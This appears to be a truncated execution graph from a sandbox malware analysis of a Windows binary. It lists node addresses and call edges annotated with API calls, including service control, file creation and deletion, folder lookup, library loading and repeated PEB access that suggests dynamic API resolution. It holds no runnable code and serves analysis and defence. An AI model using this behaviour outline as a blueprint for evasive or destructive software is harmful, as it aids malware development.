                                                                                                                execution_graph 3845 28e1a9 3850 291fd0 3845->3850 3847 28e295 3887 28ba9c 3847->3887 3849 28e2ab 3884 2933d3 3850->3884 3854 293cc9 4100 288c7c 3854->4100 3863 293cb3 4090 28c7d1 3863->4090 3865 293ca3 3865->3847 3871 29acff RtlAllocateHeap GetPEB 3871->3884 3874 286a8d GetPEB 3874->3884 3875 28e080 RtlAllocateHeap GetPEB 3875->3884 3884->3854 3884->3863 3884->3865 3884->3871 3884->3874 3884->3875 3886 28b9d7 GetPEB 3884->3886 3890 290418 3884->3890 3900 29d14c 3884->3900 3914 28b4fc 3884->3914 3921 284700 3884->3921 3931 286cbb 3884->3931 3943 28be09 3884->3943 3954 2866b0 3884->3954 3962 29882f 3884->3962 3975 29158a 3884->3975 3979 295497 3884->3979 3986 28da93 3884->3986 3990 284cb9 3884->3990 3994 29d6b1 3884->3994 4002 29afb0 3884->4002 4011 29e612 3884->4011 4017 29519b 3884->4017 4020 29ec9b 3884->4020 4026 29c535 3884->4026 4037 281b09 3884->4037 4047 29eba2 3884->4047 4052 29dad8 3884->4052 4056 29b2fc 3884->4056 4059 29baf2 3884->4059 4070 2830be 3884->4070 4075 29c16b 3884->4075 4085 285995 3884->4085 3886->3884 3888 29bff0 GetPEB 3887->3888 3889 28bb17 ExitProcess 3888->3889 3889->3849 3895 29073f 3890->3895 3892 290871 4137 289574 3892->4137 3895->3892 3898 29086f 3895->3898 4114 29a98e 3895->4114 4118 2966c2 3895->4118 4122 2832b5 3895->4122 4126 284e77 3895->4126 4132 29eaa3 3895->4132 3898->3884 3903 29d4fd 3900->3903 3904 29d67f 3903->3904 3907 29d538 3903->3907 3908 29eaa3 RtlAllocateHeap GetPEB 3903->3908 3909 29d557 3903->3909 4190 284bb4 3903->4190 4194 28d68b 3903->4194 4198 28c706 3903->4198 4206 28b9d7 3903->4206 4210 286a8d 3904->4210 4202 28d5cb 3907->4202 3908->3903 3909->3884 3912 286a8d GetPEB 3912->3909 3916 28b7a3 3914->3916 3915 29a98e CloseServiceHandle GetPEB 3915->3916 3916->3915 3917 2832b5 2 API calls 3916->3917 3919 28b8ea 3916->3919 4220 28c4eb 3916->4220 4224 291070 3916->4224 3917->3916 3919->3884 3929 2849df 3921->3929 3922 289574 GetPEB 3922->3929 3923 284a21 3923->3884 3924 284bb4 2 API calls 3924->3929 3925 284a0b 4228 28d346 3925->4228 3929->3922 3929->3923 3929->3924 3929->3925 3930 28b9d7 GetPEB 3929->3930 4238 2a110e 3929->4238 4252 29734a 3929->4252 3930->3929 4283 28588d 3931->4283 3933 287204 3933->3933 3934 284bb4 RtlAllocateHeap GetPEB 3941 2870ab 3934->3941 3935 2870da 3937 2a110e 2 API calls 3935->3937 3938 2870fb 3937->3938 3938->3884 3939 29734a GetPEB 3939->3941 3941->3933 3941->3934 3941->3935 3941->3939 3942 28b9d7 GetPEB 3941->3942 4286 28f2b9 3941->4286 4289 291bed 3941->4289 3942->3941 3947 28c23f 3943->3947 3945 284bb4 2 API calls 3945->3947 3946 28c431 4305 29e373 3946->4305 3947->3945 3947->3946 3949 28c42f 3947->3949 3950 29734a GetPEB 3947->3950 3953 28b9d7 GetPEB 3947->3953 4293 28f1d5 3947->4293 4297 29bf1c 3947->4297 4301 2918f7 3947->4301 3949->3884 3950->3947 3953->3947 3958 286937 3954->3958 3955 29bf1c 2 API calls 3955->3958 3956 286a80 3956->3884 3958->3955 3958->3956 3959 289574 GetPEB 3958->3959 3960 29e373 2 API calls 3958->3960 3961 2918f7 GetPEB 3958->3961 4309 29ba34 3958->4309 3959->3958 3960->3958 3961->3958 3971 298f07 3962->3971 3964 29915b 3967 29a98e 2 API calls 3964->3967 3965 2966c2 2 API calls 3965->3971 3966 2832b5 2 API calls 3966->3971 3968 299159 3967->3968 3968->3884 3969 284bb4 2 API calls 3969->3971 3970 29a98e 2 API calls 3970->3971 3971->3964 3971->3965 3971->3966 3971->3968 3971->3969 3971->3970 3973 291bed GetPEB 3971->3973 3974 28b9d7 GetPEB 3971->3974 4313 283511 3971->4313 4326 2840d2 3971->4326 3973->3971 3974->3971 3977 2915a4 3975->3977 3976 2909f9 LoadLibraryW RtlAllocateHeap GetPEB 3976->3977 3977->3976 3978 2916a8 3977->3978 3978->3884 3980 2954b9 3979->3980 3981 29587a 3980->3981 3984 29eaa3 2 API calls 3980->3984 3985 295878 3980->3985 4342 284627 3980->4342 3983 284627 GetPEB 3981->3983 3983->3985 3984->3980 3985->3884 3987 28daa9 3986->3987 3988 29bff0 GetPEB 3987->3988 3989 28db4e 3988->3989 3989->3884 3991 284cd5 3990->3991 3992 29bff0 GetPEB 3991->3992 3993 284d6f 3992->3993 3993->3884 4000 29d91e 3994->4000 3997 29da08 3997->3884 3998 284bb4 2 API calls 3998->4000 3999 29734a GetPEB 3999->4000 4000->3997 4000->3998 4000->3999 4001 28b9d7 GetPEB 4000->4001 4354 28ffde 4000->4354 4358 295d68 4000->4358 4001->4000 4008 29afca 4002->4008 4003 29eaa3 2 API calls 4003->4008 4004 29b130 4005 286a8d GetPEB 4004->4005 4006 29b12e 4005->4006 4006->3884 4008->4003 4008->4004 4008->4006 4382 28c5c3 4008->4382 4386 295031 4008->4386 4390 2a225a 4008->4390 4013 29e794 4011->4013 4015 29e822 4013->4015 4016 29eaa3 2 API calls 4013->4016 4510 2a032a 4013->4510 4514 29aa59 4013->4514 4015->3884 4016->4013 4018 29eaa3 2 API calls 4017->4018 4019 2951d5 4018->4019 4019->3884 4024 29ee36 4020->4024 4022 29ef0f 4022->3884 4024->4022 4025 28ffde GetPEB 4024->4025 4518 28ba25 4024->4518 4521 290c7c 4024->4521 4025->4024 4032 29cd1c 4026->4032 4028 284bb4 RtlAllocateHeap GetPEB 4028->4032 4029 291bed GetPEB 4029->4032 4030 29ade9 GetPEB 4030->4032 4031 2966c2 2 API calls 4031->4032 4032->4028 4032->4029 4032->4030 4032->4031 4033 29cfb1 4032->4033 4036 28b9d7 GetPEB 4032->4036 4559 283f09 4032->4559 4563 2a1cad 4032->4563 4567 283152 4032->4567 4033->3884 4036->4032 4044 281b3f 4037->4044 4039 28b184 GetPEB 4039->4044 4040 28225e 4040->3884 4044->4039 4044->4040 4046 286a8d GetPEB 4044->4046 4571 28a01c 4044->4571 4588 2a27df 4044->4588 4598 2995a8 4044->4598 4615 299184 4044->4615 4624 2947d2 4044->4624 4046->4044 4051 29ec4b 4047->4051 4049 29eaa3 2 API calls 4049->4051 4050 29ec91 4050->3884 4051->4049 4051->4050 4767 2a03f2 4051->4767 4053 29dd12 4052->4053 4054 28f2b9 GetPEB 4053->4054 4055 29dd3a 4053->4055 4054->4053 4055->3884 4057 284cb9 GetPEB 4056->4057 4058 29b37d 4057->4058 4058->3884 4061 29bb13 4059->4061 4066 29eaa3 2 API calls 4061->4066 4067 29bf0f 4061->4067 4800 28bb23 4061->4800 4807 2a086f 4061->4807 4819 29f24c 4061->4819 4840 282279 4061->4840 4858 28ced8 4061->4858 4866 2a13fd 4061->4866 4874 29692b 4061->4874 4066->4061 4067->3884 4071 28588d GetPEB 4070->4071 4072 28313a 4071->4072 5007 29da13 4072->5007 4077 29c3a6 4075->4077 4076 286a8d GetPEB 4076->4077 4077->4076 4081 29c514 4077->4081 4082 29c516 4077->4082 5011 295cb1 4077->5011 5015 290097 4077->5015 5020 28f605 4077->5020 5024 28e2b2 4077->5024 4081->3884 5027 28f9a7 4082->5027 4086 285aa2 4085->4086 4088 285b7d 4086->4088 5031 295c05 4086->5031 5035 28e0eb 4086->5035 4088->3884 4091 28c7eb 4090->4091 4092 28ce91 4091->4092 4093 2966c2 2 API calls 4091->4093 4094 28c453 GetPEB 4091->4094 4096 284bb4 RtlAllocateHeap GetPEB 4091->4096 4097 28ce8f 4091->4097 4098 28b9d7 GetPEB 4091->4098 4099 291bed GetPEB 4091->4099 4095 2963f0 3 API calls 4092->4095 4093->4091 4094->4091 4095->4097 4096->4091 4097->3865 4098->4091 4099->4091 4103 288fba 4100->4103 4101 284bb4 2 API calls 4101->4103 4103->4101 4104 29734a GetPEB 4103->4104 4106 2890e2 4103->4106 4107 2a110e 2 API calls 4103->4107 4108 28b9d7 GetPEB 4103->4108 4111 28b4fc 4 API calls 4103->4111 4112 2890e0 4103->4112 5039 28d899 4103->5039 5046 289133 4103->5046 4104->4103 4109 28ffde GetPEB 4106->4109 4107->4103 4108->4103 4110 2890fb 4109->4110 5055 28f6cf 4110->5055 4111->4103 4112->3865 4115 29a9a1 4114->4115 4141 29bff0 4115->4141 4119 2966e9 4118->4119 4120 29bff0 GetPEB 4119->4120 4121 29676b SHGetFolderPathW 4120->4121 4121->3895 4123 2832cd 4122->4123 4124 29bff0 GetPEB 4123->4124 4125 28337c OpenSCManagerW 4124->4125 4125->3895 4131 284fae 4126->4131 4129 289574 GetPEB 4129->4131 4130 285080 4130->3895 4131->4129 4131->4130 4171 29ade9 4131->4171 4175 2a07bb 4131->4175 4179 28645e 4132->4179 4136 29eb9a 4136->3895 4138 28958e 4137->4138 4186 289aac 4138->4186 4142 29aa46 CloseServiceHandle 4141->4142 4143 29c0a6 4141->4143 4142->3895 4147 2a1ae9 4143->4147 4145 29c0ba 4150 29b558 4145->4150 4154 29aa52 GetPEB 4147->4154 4149 2a1b98 4149->4145 4152 29b575 4150->4152 4151 29b64f 4151->4142 4152->4151 4155 29b384 4152->4155 4154->4149 4156 29b4de 4155->4156 4163 29e545 4156->4163 4159 29b520 4161 29b54f 4159->4161 4162 29b558 GetPEB 4159->4162 4161->4151 4162->4161 4164 29e558 4163->4164 4165 29bff0 GetPEB 4164->4165 4166 29b506 4165->4166 4166->4159 4167 29e9a4 4166->4167 4168 29e9b4 4167->4168 4169 29bff0 GetPEB 4168->4169 4170 29ea43 4169->4170 4170->4159 4172 29ae00 4171->4172 4173 29bff0 GetPEB 4172->4173 4174 29aea1 4173->4174 4174->4131 4176 2a07d1 4175->4176 4177 29bff0 GetPEB 4176->4177 4178 2a0861 4177->4178 4178->4131 4180 29bff0 GetPEB 4179->4180 4181 2864fc 4180->4181 4182 291b22 4181->4182 4183 291b41 4182->4183 4184 29bff0 GetPEB 4183->4184 4185 291bdd RtlAllocateHeap 4184->4185 4185->4136 4187 289ace 4186->4187 4188 29bff0 GetPEB 4187->4188 4189 289601 4188->4189 4189->3898 4191 284bce 4190->4191 4192 29eaa3 2 API calls 4191->4192 4193 284c3e 4192->4193 4193->3903 4195 28d6aa 4194->4195 4196 29bff0 GetPEB 4195->4196 4197 28d746 4196->4197 4197->3903 4199 28c728 4198->4199 4200 29bff0 GetPEB 4199->4200 4201 28c7bd 4200->4201 4201->3903 4203 28d5e4 4202->4203 4204 29bff0 GetPEB 4203->4204 4205 28d67d 4204->4205 4205->3909 4207 28b9e9 4206->4207 4208 286a8d GetPEB 4207->4208 4209 28ba1e 4208->4209 4209->3903 4211 286a9d 4210->4211 4212 28645e GetPEB 4211->4212 4213 286bbb 4212->4213 4216 2950b6 4213->4216 4217 2950d5 4216->4217 4218 29bff0 GetPEB 4217->4218 4219 286bd4 4218->4219 4219->3912 4221 28c507 4220->4221 4222 29bff0 GetPEB 4221->4222 4223 28c5b2 OpenServiceW 4222->4223 4223->3916 4225 291089 4224->4225 4226 29bff0 GetPEB 4225->4226 4227 291122 4226->4227 4227->3916 4229 28d35d 4228->4229 4230 284bb4 2 API calls 4229->4230 4231 28d4ea 4230->4231 4256 28fd5f 4231->4256 4234 28b9d7 GetPEB 4235 28d516 4234->4235 4260 289ea8 4235->4260 4237 28d52a 4237->3923 4239 2a1128 4238->4239 4267 28b184 4239->4267 4242 28b184 GetPEB 4243 2a1378 4242->4243 4244 28b184 GetPEB 4243->4244 4245 2a138d 4244->4245 4246 2a07bb GetPEB 4245->4246 4247 2a13a2 4246->4247 4248 2a07bb GetPEB 4247->4248 4249 2a13ba 4248->4249 4271 28338b 4249->4271 4251 2a13f0 4251->3929 4253 29736f 4252->4253 4254 28f56b GetPEB 4253->4254 4255 29738c 4254->4255 4255->3929 4257 28fd7b 4256->4257 4264 28f56b 4257->4264 4261 289ebe 4260->4261 4262 29bff0 GetPEB 4261->4262 4263 289f4d DeleteFileW 4262->4263 4263->4237 4265 29bff0 GetPEB 4264->4265 4266 28d507 4265->4266 4266->4234 4268 28b19a 4267->4268 4275 29c0df 4268->4275 4272 28339b 4271->4272 4273 29bff0 GetPEB 4272->4273 4274 283449 SHFileOperationW 4273->4274 4274->4251 4276 29c0fa 4275->4276 4279 29e0ca 4276->4279 4280 29e0e7 4279->4280 4281 29bff0 GetPEB 4280->4281 4282 28b1f9 4281->4282 4282->4242 4284 29bff0 GetPEB 4283->4284 4285 285939 4284->4285 4285->3941 4287 29bff0 GetPEB 4286->4287 4288 28f361 4287->4288 4288->3941 4290 291c12 4289->4290 4291 28f56b GetPEB 4290->4291 4292 291c34 4291->4292 4292->3941 4294 28f1fa 4293->4294 4295 29bff0 GetPEB 4294->4295 4296 28f2a8 SetFileInformationByHandle 4295->4296 4296->3947 4298 29bf49 4297->4298 4299 29bff0 GetPEB 4298->4299 4300 29bfd6 CreateFileW 4299->4300 4300->3947 4302 29190a 4301->4302 4303 29bff0 GetPEB 4302->4303 4304 291999 4303->4304 4304->3947 4306 29e389 4305->4306 4307 29bff0 GetPEB 4306->4307 4308 29e42b CloseHandle 4307->4308 4308->3949 4310 29ba53 4309->4310 4311 29bff0 GetPEB 4310->4311 4312 29bae0 4311->4312 4312->3958 4322 283537 4313->4322 4314 283c34 4316 286a8d GetPEB 4314->4316 4315 29eaa3 RtlAllocateHeap GetPEB 4315->4322 4319 283c45 4316->4319 4317 286a8d GetPEB 4317->4322 4319->3971 4321 29a98e 2 API calls 4321->4322 4322->4314 4322->4315 4322->4317 4322->4319 4322->4321 4323 28c4eb 2 API calls 4322->4323 4325 28f2b9 GetPEB 4322->4325 4330 29b14e 4322->4330 4334 2913d4 4322->4334 4338 29a3e6 4322->4338 4323->4322 4325->4322 4327 28411c 4326->4327 4328 29bff0 GetPEB 4327->4328 4329 28419f 4328->4329 4329->3971 4331 29b16a 4330->4331 4332 29bff0 GetPEB 4331->4332 4333 29b205 4332->4333 4333->4322 4335 29140f 4334->4335 4336 29bff0 GetPEB 4335->4336 4337 2914bb 4336->4337 4337->4322 4339 29a415 4338->4339 4340 29bff0 GetPEB 4339->4340 4341 29a4a0 4340->4341 4341->4322 4343 284640 4342->4343 4346 291d1c 4343->4346 4347 291d3a 4346->4347 4350 282fe6 4347->4350 4351 283002 4350->4351 4352 29bff0 GetPEB 4351->4352 4353 2830ae 4352->4353 4353->3980 4355 28fff1 4354->4355 4356 29bff0 GetPEB 4355->4356 4357 29008b 4356->4357 4357->4000 4359 295d94 4358->4359 4360 2963d3 4359->4360 4362 284bb4 RtlAllocateHeap GetPEB 4359->4362 4365 2963d1 4359->4365 4366 29734a GetPEB 4359->4366 4367 28fd5f GetPEB 4359->4367 4368 295d68 2 API calls 4359->4368 4369 28b9d7 GetPEB 4359->4369 4370 28fa6c 4359->4370 4374 28fe4b 4359->4374 4378 28428c 4360->4378 4362->4359 4365->4000 4366->4359 4367->4359 4368->4359 4369->4359 4371 28fa85 4370->4371 4372 29bff0 GetPEB 4371->4372 4373 28fb15 4372->4373 4373->4359 4375 28fe5e 4374->4375 4376 29bff0 GetPEB 4375->4376 4377 28fef3 4376->4377 4377->4359 4379 2842a5 4378->4379 4380 29bff0 GetPEB 4379->4380 4381 284337 4380->4381 4381->4365 4383 28c61f 4382->4383 4384 28c635 4382->4384 4383->4384 4385 286a8d GetPEB 4383->4385 4384->4008 4385->4383 4387 295047 4386->4387 4400 290b4c 4387->4400 4394 2a252f 4390->4394 4391 2a2704 4391->4008 4392 284bb4 2 API calls 4392->4394 4393 2a26f3 4395 286a8d GetPEB 4393->4395 4394->4391 4394->4392 4394->4393 4397 29eaa3 2 API calls 4394->4397 4398 28b9d7 GetPEB 4394->4398 4502 29acff 4394->4502 4506 28c453 4394->4506 4395->4391 4397->4394 4398->4394 4405 290b68 4400->4405 4402 290c59 4404 286a8d GetPEB 4402->4404 4406 290c57 4404->4406 4405->4402 4405->4406 4407 29eaa3 2 API calls 4405->4407 4409 287786 4405->4409 4426 28508b 4405->4426 4435 283210 4405->4435 4406->4008 4407->4405 4424 28842c 4409->4424 4410 2888b0 4411 28d5cb GetPEB 4410->4411 4413 2888ae 4411->4413 4412 28f36a GetPEB 4412->4424 4413->4405 4420 284bb4 RtlAllocateHeap GetPEB 4420->4424 4422 291d1c GetPEB 4422->4424 4423 28d68b GetPEB 4423->4424 4424->4410 4424->4412 4424->4413 4424->4420 4424->4422 4424->4423 4425 28b9d7 GetPEB 4424->4425 4440 289f58 4424->4440 4444 28bd30 4424->4444 4448 28b40a 4424->4448 4452 28fd9d 4424->4452 4456 297473 4424->4456 4482 284d7d 4424->4482 4486 29677f 4424->4486 4425->4424 4434 2855c3 4426->4434 4427 28575d 4429 28d5cb GetPEB 4427->4429 4428 28575b 4428->4405 4429->4428 4430 284bb4 RtlAllocateHeap GetPEB 4430->4434 4431 28d68b GetPEB 4431->4434 4432 28b40a GetPEB 4432->4434 4433 28b9d7 GetPEB 4433->4434 4434->4427 4434->4428 4434->4430 4434->4431 4434->4432 4434->4433 4436 29677f GetPEB 4435->4436 4437 28329c 4436->4437 4438 286a8d GetPEB 4437->4438 4439 2832af 4438->4439 4439->4405 4441 289f7a 4440->4441 4442 29bff0 GetPEB 4441->4442 4443 28a009 4442->4443 4443->4424 4445 28bd52 4444->4445 4446 29bff0 GetPEB 4445->4446 4447 28bdf5 4446->4447 4447->4424 4449 28b43a 4448->4449 4450 29bff0 GetPEB 4449->4450 4451 28b4e0 4450->4451 4451->4424 4453 28fdb3 4452->4453 4454 29bff0 GetPEB 4453->4454 4455 28fe3d 4454->4455 4455->4424 4467 298307 4456->4467 4457 28d5cb GetPEB 4457->4467 4458 298558 4462 284bb4 2 API calls 4458->4462 4459 286a8d GetPEB 4459->4467 4460 29eaa3 2 API calls 4460->4467 4461 2986af 4465 284bb4 RtlAllocateHeap GetPEB 4461->4465 4471 28d68b GetPEB 4461->4471 4475 28b9d7 GetPEB 4461->4475 4466 298578 4462->4466 4464 2987d6 4464->4424 4465->4461 4468 284bb4 2 API calls 4466->4468 4467->4457 4467->4458 4467->4459 4467->4460 4467->4461 4467->4464 4469 284bb4 RtlAllocateHeap GetPEB 4467->4469 4470 28b9d7 GetPEB 4467->4470 4490 288ab6 4467->4490 4494 2865d5 4467->4494 4472 29859a 4468->4472 4469->4467 4470->4467 4471->4461 4473 29ade9 GetPEB 4472->4473 4476 2985c6 4473->4476 4475->4461 4498 29cfc3 4476->4498 4479 28b9d7 GetPEB 4480 298697 4479->4480 4481 28b9d7 GetPEB 4480->4481 4481->4461 4483 284dad 4482->4483 4484 29bff0 GetPEB 4483->4484 4485 284e5c 4484->4485 4485->4424 4487 296792 4486->4487 4488 29bff0 GetPEB 4487->4488 4489 296834 4488->4489 4489->4424 4491 288af6 4490->4491 4492 29bff0 GetPEB 4491->4492 4493 288baa 4492->4493 4493->4467 4495 286602 4494->4495 4496 29bff0 GetPEB 4495->4496 4497 286697 4496->4497 4497->4467 4499 29cff4 4498->4499 4500 29bff0 GetPEB 4499->4500 4501 298667 4500->4501 4501->4479 4503 29ad1f 4502->4503 4504 29eaa3 2 API calls 4503->4504 4505 29ad9c 4504->4505 4505->4394 4505->4505 4507 28c481 4506->4507 4508 28f56b GetPEB 4507->4508 4509 28c4a8 4508->4509 4509->4394 4511 2a0343 4510->4511 4512 29bff0 GetPEB 4511->4512 4513 2a03e4 4512->4513 4513->4013 4515 29aa83 4514->4515 4516 29bff0 GetPEB 4515->4516 4517 29ab22 4516->4517 4517->4013 4529 293cdd 4518->4529 4522 290c9d 4521->4522 4552 28f43b 4522->4552 4525 290e00 4525->4024 4528 29e373 2 API calls 4528->4525 4532 293d02 4529->4532 4535 28ba93 4532->4535 4536 293f17 4532->4536 4538 285942 4532->4538 4541 291a72 4532->4541 4545 29efa0 4532->4545 4549 28b34c 4532->4549 4535->4024 4537 29e373 2 API calls 4536->4537 4537->4535 4539 28588d GetPEB 4538->4539 4540 28597a 4539->4540 4540->4532 4542 291a88 4541->4542 4543 29bff0 GetPEB 4542->4543 4544 291b14 4543->4544 4544->4532 4546 29efb9 4545->4546 4547 29bff0 GetPEB 4546->4547 4548 29f052 4547->4548 4548->4532 4550 29bff0 GetPEB 4549->4550 4551 28b3f2 4550->4551 4551->4532 4553 29bff0 GetPEB 4552->4553 4554 28f4f2 4553->4554 4554->4525 4555 2914da 4554->4555 4556 2914f9 4555->4556 4557 29bff0 GetPEB 4556->4557 4558 290dee 4557->4558 4558->4528 4560 283f42 4559->4560 4561 29bff0 GetPEB 4560->4561 4562 283ff1 4561->4562 4562->4032 4564 2a1cd8 4563->4564 4565 29bff0 GetPEB 4564->4565 4566 2a1d53 4565->4566 4566->4032 4568 283169 4567->4568 4569 29bff0 GetPEB 4568->4569 4570 283203 4569->4570 4570->4032 4582 28a07f 4571->4582 4572 295b4c GetPEB 4572->4582 4574 28b074 4668 295b4c 4574->4668 4575 284bb4 2 API calls 4575->4582 4578 28b08a 4578->4044 4582->4572 4582->4574 4582->4575 4582->4578 4584 286a8d GetPEB 4582->4584 4585 28b9d7 GetPEB 4582->4585 4586 29e29a GetPEB 4582->4586 4636 2941cf 4582->4636 4645 285797 4582->4645 4649 285b8a 4582->4649 4652 286505 4582->4652 4656 28400f 4582->4656 4660 29aeae 4582->4660 4664 29b215 4582->4664 4584->4582 4585->4582 4586->4582 4596 2a2a55 4588->4596 4590 2a2bb0 4592 286a8d GetPEB 4590->4592 4591 29eaa3 2 API calls 4591->4596 4593 2a2bae 4592->4593 4593->4044 4594 284bb4 2 API calls 4594->4596 4595 28f56b GetPEB 4595->4596 4596->4590 4596->4591 4596->4593 4596->4594 4596->4595 4597 28b9d7 GetPEB 4596->4597 4680 2951e8 4596->4680 4597->4596 4613 299fc8 4598->4613 4599 29a353 4601 29e18b 2 API calls 4599->4601 4600 286a8d GetPEB 4600->4613 4603 29a379 4601->4603 4602 291d1c GetPEB 4602->4613 4699 28c4b0 4603->4699 4604 29a34e 4604->4044 4606 29eaa3 RtlAllocateHeap GetPEB 4606->4613 4608 284bb4 2 API calls 4608->4613 4611 28b9d7 GetPEB 4611->4604 4612 28f56b GetPEB 4612->4613 4613->4599 4613->4600 4613->4602 4613->4604 4613->4606 4613->4608 4613->4612 4614 28b9d7 GetPEB 4613->4614 4691 29e18b 4613->4691 4695 299556 4613->4695 4614->4613 4622 2991ae 4615->4622 4616 299537 4618 286a8d GetPEB 4616->4618 4620 299535 4618->4620 4620->4044 4621 29eaa3 2 API calls 4621->4622 4622->4616 4622->4620 4622->4621 4623 291d1c GetPEB 4622->4623 4703 2916ad 4622->4703 4709 289617 4622->4709 4623->4622 4635 2947fd 4624->4635 4627 29500a 4629 286a8d GetPEB 4627->4629 4631 29501e 4629->4631 4630 28e379 2 API calls 4630->4635 4631->4044 4632 291d1c GetPEB 4632->4635 4633 286a8d GetPEB 4633->4635 4634 29eaa3 2 API calls 4634->4635 4635->4627 4635->4630 4635->4631 4635->4632 4635->4633 4635->4634 4751 284342 4635->4751 4756 29a4b5 4635->4756 4763 288bcb 4635->4763 4643 294420 4636->4643 4637 294518 4639 294520 4637->4639 4641 286a8d GetPEB 4637->4641 4638 29eaa3 RtlAllocateHeap GetPEB 4638->4643 4639->4582 4641->4639 4642 291d1c GetPEB 4642->4643 4643->4637 4643->4638 4643->4642 4644 286a8d GetPEB 4643->4644 4672 287209 4643->4672 4644->4643 4646 2857d2 4645->4646 4647 29bff0 GetPEB 4646->4647 4648 285872 4647->4648 4648->4582 4676 2a1933 4649->4676 4653 28652a 4652->4653 4654 29bff0 GetPEB 4653->4654 4655 2865c3 4654->4655 4655->4582 4657 284036 4656->4657 4658 29bff0 GetPEB 4657->4658 4659 2840bd 4658->4659 4659->4582 4661 29aedf 4660->4661 4662 29bff0 GetPEB 4661->4662 4663 29af74 4662->4663 4663->4582 4665 29b237 4664->4665 4666 29bff0 GetPEB 4665->4666 4667 29b2e9 4666->4667 4667->4582 4669 295b62 4668->4669 4670 29bff0 GetPEB 4669->4670 4671 295bfa 4670->4671 4671->4578 4673 28722b 4672->4673 4674 29bff0 GetPEB 4673->4674 4675 2872b9 4674->4675 4675->4643 4677 2a1957 4676->4677 4678 29bff0 GetPEB 4677->4678 4679 285c87 4678->4679 4679->4582 4681 2951fe 4680->4681 4682 29545d 4681->4682 4683 29545b 4681->4683 4686 29eaa3 2 API calls 4681->4686 4687 28c63a 4681->4687 4684 28c63a GetPEB 4682->4684 4683->4596 4684->4683 4686->4681 4688 28c662 4687->4688 4689 29bff0 GetPEB 4688->4689 4690 28c6f0 4689->4690 4690->4681 4692 29e1a5 4691->4692 4693 29eaa3 2 API calls 4692->4693 4694 29e230 4693->4694 4694->4613 4694->4694 4696 29957e 4695->4696 4697 28f56b GetPEB 4696->4697 4698 2995a0 4697->4698 4698->4613 4700 28c4c9 4699->4700 4701 28f56b GetPEB 4700->4701 4702 28c4e3 4701->4702 4702->4611 4705 2916c7 4703->4705 4704 2918a9 4731 29595c 4704->4731 4705->4704 4706 2918a7 4705->4706 4716 28e379 4705->4716 4706->4622 4711 289644 4709->4711 4710 29eaa3 2 API calls 4710->4711 4711->4710 4712 2912ef GetPEB 4711->4712 4713 289996 4711->4713 4714 289985 4711->4714 4712->4711 4713->4622 4715 286a8d GetPEB 4714->4715 4715->4713 4726 28e3b8 4716->4726 4717 28f19d 4718 28d5cb GetPEB 4717->4718 4720 28f19b 4718->4720 4719 284bb4 RtlAllocateHeap GetPEB 4719->4726 4720->4705 4722 29eaa3 2 API calls 4722->4726 4724 2865d5 GetPEB 4724->4726 4725 286a8d GetPEB 4725->4726 4726->4717 4726->4719 4726->4720 4726->4722 4726->4724 4726->4725 4729 28d68b GetPEB 4726->4729 4730 28b9d7 GetPEB 4726->4730 4735 2841c6 4726->4735 4739 28b8f4 4726->4739 4743 28fb23 4726->4743 4747 29ac2c 4726->4747 4729->4726 4730->4726 4732 295988 4731->4732 4733 29bff0 GetPEB 4732->4733 4734 295a2b 4733->4734 4734->4706 4736 2841eb 4735->4736 4737 29bff0 GetPEB 4736->4737 4738 284279 4737->4738 4738->4726 4740 28b919 4739->4740 4741 29bff0 GetPEB 4740->4741 4742 28b9c4 4741->4742 4742->4726 4744 28fb3c 4743->4744 4745 29bff0 GetPEB 4744->4745 4746 28fbed 4745->4746 4746->4726 4748 29ac56 4747->4748 4749 29bff0 GetPEB 4748->4749 4750 29ace2 4749->4750 4750->4726 4754 284361 4751->4754 4752 284627 GetPEB 4752->4754 4753 2845f4 4753->4635 4754->4752 4754->4753 4755 29eaa3 2 API calls 4754->4755 4755->4754 4758 29a4e1 4756->4758 4757 29e436 GetPEB 4757->4758 4758->4757 4759 29a861 4758->4759 4760 29eaa3 2 API calls 4758->4760 4762 29a872 4758->4762 4761 286a8d GetPEB 4759->4761 4760->4758 4761->4762 4762->4635 4764 288bde 4763->4764 4765 291d1c GetPEB 4764->4765 4766 288c72 4765->4766 4766->4635 4768 2a041a 4767->4768 4770 2a06d7 4768->4770 4771 2a0738 4768->4771 4788 286bfa 4768->4788 4772 29e18b 2 API calls 4770->4772 4771->4051 4773 2a06f1 4772->4773 4779 29112d 4773->4779 4778 28b9d7 GetPEB 4778->4771 4792 284b09 4779->4792 4781 2912e4 4784 29ef56 4781->4784 4785 29ef7b 4784->4785 4786 28f56b GetPEB 4785->4786 4787 29ef98 4786->4787 4787->4778 4789 286c16 4788->4789 4790 29bff0 GetPEB 4789->4790 4791 286cad 4790->4791 4791->4768 4793 284b23 4792->4793 4794 29bff0 GetPEB 4793->4794 4795 284ba7 4794->4795 4795->4781 4796 29683f 4795->4796 4797 296871 4796->4797 4798 29bff0 GetPEB 4797->4798 4799 296911 4798->4799 4799->4781 4801 28bcba 4800->4801 4802 28bd24 4801->4802 4803 284cb9 GetPEB 4801->4803 4804 286a8d GetPEB 4801->4804 4806 29e373 2 API calls 4801->4806 4894 290f7a 4801->4894 4802->4061 4803->4801 4804->4801 4806->4801 4816 2a0d01 4807->4816 4808 2a0d19 4902 2963f0 4808->4902 4809 289574 GetPEB 4809->4816 4811 2a0d42 4811->4061 4812 28ffde GetPEB 4812->4816 4814 284bb4 2 API calls 4814->4816 4815 29734a GetPEB 4815->4816 4816->4808 4816->4809 4816->4811 4816->4812 4816->4814 4816->4815 4817 28b9d7 GetPEB 4816->4817 4912 28b200 4816->4912 4916 289b80 4816->4916 4817->4816 4931 29e034 4819->4931 4821 2963f0 3 API calls 4838 29fedc 4821->4838 4822 2966c2 2 API calls 4822->4838 4823 286a8d GetPEB 4823->4838 4824 2a02ff 4829 29e373 2 API calls 4824->4829 4825 29ade9 GetPEB 4825->4838 4826 2951e8 2 API calls 4826->4838 4828 2a02fd 4828->4061 4829->4828 4831 289574 GetPEB 4831->4838 4832 291bed GetPEB 4832->4838 4833 28ffde GetPEB 4833->4838 4834 28b9d7 GetPEB 4834->4838 4835 28b200 GetPEB 4835->4838 4836 284bb4 RtlAllocateHeap GetPEB 4836->4838 4837 29734a GetPEB 4837->4838 4838->4821 4838->4822 4838->4823 4838->4824 4838->4825 4838->4826 4838->4828 4838->4831 4838->4832 4838->4833 4838->4834 4838->4835 4838->4836 4838->4837 4839 289b80 3 API calls 4838->4839 4934 28f784 4838->4934 4940 28d7a6 4838->4940 4839->4838 4850 282bc8 4840->4850 4841 2963f0 3 API calls 4841->4850 4844 289574 GetPEB 4844->4850 4845 29e373 GetPEB CloseHandle 4845->4850 4846 2830be GetPEB 4846->4850 4848 28ffde GetPEB 4848->4850 4849 282c16 4851 